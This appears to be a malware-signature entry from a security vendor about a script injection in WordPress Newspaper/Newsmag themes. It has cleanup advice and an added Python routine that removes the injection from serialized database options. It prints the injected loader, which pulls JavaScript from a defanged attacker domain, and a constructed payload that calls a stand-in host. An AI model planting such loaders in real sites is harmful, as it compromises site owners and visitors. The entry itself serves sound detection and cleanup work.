
Malware entry: malware.injection.27

Description:

Injection of a remote script typically made either via vulnerabilities in Newspaper/Newsmag themes or via abandoned searchreplacedb2.php scripts.

Sample

<script type="text/javascript">var t = document.createElement("script"); t.type = "text/javascript" t.src = "hxxps://mp.trymynewspirit[.]com/s.js" document.head.appendChild(t);</script>
Domain names change frequently.

Cleanup

In case of a Newsmag/Newspaper infection, the malicious code should typically be removed from the "Ads" and "Custom Javascript" settings of the theme. The theme should be updated to prevent reinfections.

In case of the searchreplacedb2.php infection vector, the script should be removed from WordPress posts and from various options in the wp_options table. If you are using a database search and replace tool, make sure it works correctly with serialized data, otherwise it may break the site.
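
The serialized-data caveat above, as an added example (not Sucuri's code or signature): PHP-serialized strings carry a byte-length prefix, so a plain search and replace leaves a stale length and the option no longer unserializes. The regex, the function names and the malicious.example domain are assumptions made for illustration; only arrays, strings and scalars are handled, and anything else is refused so it can be reviewed by hand.

```python
import re

# Assumed pattern for the loader shape in the sample (not a vendor signature).
INJECTION = re.compile(
    rb'<script[^>]*>\s*var\s+(\w+)\s*=\s*document\.createElement\("script"\);'
    rb'.*?document\.head\.appendChild\(\1\);\s*</script>', re.S)

def _walk(buf, pos, out):
    """Copy one PHP-serialized value to out, cleaning strings; return end offset."""
    tag = buf[pos:pos + 1]
    if tag in (b'N', b'b', b'i', b'd'):               # N;  b:1;  i:42;  d:0.5;
        end = buf.index(b';', pos) + 1
        out.append(buf[pos:end])
        return end
    if tag == b's':                                   # s:<byte length>:"<bytes>";
        colon = buf.index(b':', pos + 2)
        n, start = int(buf[pos + 2:colon]), colon + 2
        if buf[start + n:start + n + 2] != b'";':
            raise ValueError('string length prefix does not match its data')
        clean = INJECTION.sub(b'', buf[start:start + n])
        out.append(b's:%d:"%s";' % (len(clean), clean))  # recompute the length
        return start + n + 2
    if tag == b'a':                                   # a:<count>:{<key><value>...}
        brace = buf.index(b'{', pos)
        count = int(buf[pos + 2:brace - 1])
        out.append(buf[pos:brace + 1])
        pos = brace + 1
        for _ in range(2 * count):                    # keys and values alternate
            pos = _walk(buf, pos, out)
        if buf[pos:pos + 1] != b'}':
            raise ValueError('array is not closed')
        out.append(b'}')
        return pos + 1
    raise ValueError('unsupported type %r; review this value by hand' % tag)

def clean_option(value):
    """Strip the injection from a wp_options value (bytes), serialized or plain."""
    if not re.match(rb'(a:\d+:\{|s:\d+:")', value):
        return INJECTION.sub(b'', value)              # plain text has no length prefix
    out = []
    if _walk(value, 0, out) != len(value):
        raise ValueError('trailing data after serialized value')
    return b''.join(out)

# Constructed sample: a theme option array with the loader in one field.
PAYLOAD = (b'<script type="text/javascript">var t = document.createElement("script");'
           b' t.src = "https://malicious.example/s.js"; document.head.appendChild(t);</script>')
BODY = PAYLOAD + b'console.log(1);'
INFECTED = b'a:2:{s:9:"custom_js";s:%d:"%s";s:7:"enabled";b:1;}' % (len(BODY), BODY)
```

Calling clean_option(INFECTED) returns the array with the string length rewritten to 15, while a value that was already edited with a plain replace raises ValueError instead of being written back.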



Affecting: As of 2017, mostly WordPress sites.

For more information read our blogpost


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb